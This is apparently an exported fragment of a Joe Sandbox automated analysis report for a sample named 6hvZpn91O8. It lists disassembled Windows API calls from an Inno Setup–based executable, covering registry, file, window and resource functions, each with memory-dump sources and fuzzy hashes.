                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: DrawText$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 65125430-0
                                                                              • Opcode ID: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                              • Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
                                                                              • Opcode Fuzzy Hash: ba67a2f4d1841ae75712bddd7de105be3c5bdedf26297cf57516476b8703cb91
                                                                              • Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669
                                                                              APIs
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                              • TranslateMessage.USER32(?), ref: 0042449F
                                                                              • DispatchMessageA.USER32(?), ref: 004244A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DispatchPeekTranslate
                                                                              • String ID:
                                                                              • API String ID: 4217535847-0
                                                                              • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                              • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                              • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                              • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                              APIs
                                                                              • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                              • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Prop$Window
                                                                              • String ID:
                                                                              • API String ID: 3363284559-0
                                                                              • Opcode ID: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                              • Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
                                                                              • Opcode Fuzzy Hash: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                              • Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                              • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                              • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableEnabledVisible
                                                                              • String ID:
                                                                              • API String ID: 3234591441-0
                                                                              • Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                              • Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
                                                                              • Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                              • Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78
                                                                              APIs
                                                                              • SetActiveWindow.USER32(?), ref: 00480C2A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID: InitializeWizard
                                                                              • API String ID: 2558294473-2356795471
                                                                              • Opcode ID: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                              • Instruction ID: 7183a9f40d151cc4564f9c637f0f3a65215fdab84d47651bf6ef09736f3ca39c
                                                                              • Opcode Fuzzy Hash: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                              • Instruction Fuzzy Hash: C511C1302142049FD754EB6AFD82B0A7BA8E716728F10447BE810C77A1EB79AC64C79D
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047AFF1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                              • API String ID: 47109696-1019749484
                                                                              • Opcode ID: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                              • Instruction ID: 32b1a4b4f3febb624688285ac2ab15cdeec5a734a0466c395ac52858640c886b
                                                                              • Opcode Fuzzy Hash: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                              • Instruction Fuzzy Hash: 7CF0E93170021467D700A55A6D02BAF528DCB80358F20407FF508EB342DABA9D06039C
                                                                              APIs
                                                                              • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                              Strings
                                                                              • Inno Setup: Setup Version, xrefs: 0046DE8D
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID: Inno Setup: Setup Version
                                                                              • API String ID: 3702945584-4166306022
                                                                              • Opcode ID: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                              • Instruction ID: 3f565b73c41be68d18d1c675279a4c2ca8d62721aeaae2bfa6e8ff1167108c85
                                                                              • Opcode Fuzzy Hash: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                              • Instruction Fuzzy Hash: 6AE06D717016043FD710AA2BDC85F6BBADCDF983A5F10403AB908EB392D578DD0081A8
                                                                              APIs
                                                                              • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1,?), ref: 0046DEEF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID: NoModify
                                                                              • API String ID: 3702945584-1699962838
                                                                              • Opcode ID: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                              • Instruction ID: 16e32e904041cf2989cb5be4c2021f94977a521c7974260517dd4293f9cbe128
                                                                              • Opcode Fuzzy Hash: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                              • Instruction Fuzzy Hash: 64E04FB0A04304BFEB04EB55CD4AF6F77ACDB48754F104059BA089B291E674EE00C668
                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              Strings
                                                                              • System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID: System\CurrentControlSet\Control\Windows
                                                                              • API String ID: 71445658-1109719901
                                                                              • Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                              • Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
                                                                              • Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                              • Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4
                                                                              APIs
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000), ref: 0045384B
                                                                              • FindClose.KERNEL32(000000FF,00453876,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000,00000001), ref: 00453869
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileNext
                                                                              • String ID:
                                                                              • API String ID: 2066263336-0
                                                                              • Opcode ID: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                              • Instruction ID: 9ec0e3c397c6f5708f2a232916c112a37fe27e538a562d44e8698fe4f4711445
                                                                              • Opcode Fuzzy Hash: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                              • Instruction Fuzzy Hash: AA81B37090424D9FCF11EF65C8417EFBBB4AF4934AF1480AAE84067392D3399B4ACB58
                                                                              APIs
                                                                              • GetACP.KERNEL32(?,?,00000001,00000000,0047CC8B,?,-0000001A,0047EBEA,-00000010,?,00000004,0000001A,00000000,0047EF37,?,0045D288), ref: 0047CA22
                                                                                • Part of subcall function 0042E244: 73A1A570.USER32(00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 0042E253
                                                                                • Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
                                                                                • Part of subcall function 0042E244: 73A1A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E296
                                                                              • SendNotifyMessageA.USER32(00010432,00000496,00002711,-00000001), ref: 0047CBF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A480A570EnumFontsMessageNotifySend
                                                                              • String ID:
                                                                              • API String ID: 2685184028-0
                                                                              • Opcode ID: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                              • Instruction ID: fce8b5d73ed99f1e2ef66d4a8ce886950ac346dadb3b378a3b6f7676f451f25a
                                                                              • Opcode Fuzzy Hash: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                              • Instruction Fuzzy Hash: 585172346001048BC720EF26E9C668B3799EB54309B50C57FB8489B7A7C73CED468B9E
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              • Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                              • Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
                                                                              • Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                              • Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95
                                                                              APIs
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
                                                                              • RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseEnum
                                                                              • String ID:
                                                                              • API String ID: 2818636725-0
                                                                              • Opcode ID: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                              • Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
                                                                              • Opcode Fuzzy Hash: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                              • Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045CF34
                                                                              • BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045CF7A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AllocDecompressInitVirtualZ2_bz
                                                                              • String ID:
                                                                              • API String ID: 3582128297-0
                                                                              • Opcode ID: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                              • Instruction ID: 1a4503516ee109fc6ad3b2554e9268a8a2595667017840414d64b8ef7de05fed
                                                                              • Opcode Fuzzy Hash: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                              • Instruction Fuzzy Hash: D0110872600700BFD310CF258982B96BBA6FF44751F044127E908D7681E7B9A928CBD8
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                              • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFree
                                                                              • String ID:
                                                                              • API String ID: 4097029671-0
                                                                              • Opcode ID: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                              • Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
                                                                              • Opcode Fuzzy Hash: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                              • Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD
                                                                              APIs
                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00452322
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00452348), ref: 0045232A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastMove
                                                                              • String ID:
                                                                              • API String ID: 55378915-0
                                                                              • Opcode ID: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                              • Instruction ID: cd5642aef6cf07d7f8e9267465b44b1c19008dc4a29441b527747bf004e73304
                                                                              • Opcode Fuzzy Hash: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                              • Instruction Fuzzy Hash: 0301F971B04744BBCB00DFB99D415AEB7ECDB4932575045BBFC08E3252EA7C5E088598
                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E09
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E11
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1375471231-0
                                                                              • Opcode ID: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                              • Instruction ID: 865e03444c10a102779f68a5f284ef85491b61924e311ce2fbbb44c68c5af0ec
                                                                              • Opcode Fuzzy Hash: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                              • Instruction Fuzzy Hash: 03F0C871A04604ABCB10DF759C4269EB7E8DB49315B5049B7FC04E7652E63D5E088598
                                                                              APIs
                                                                              • DeleteFileA.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451F9F
                                                                              • GetLastError.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451FA7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
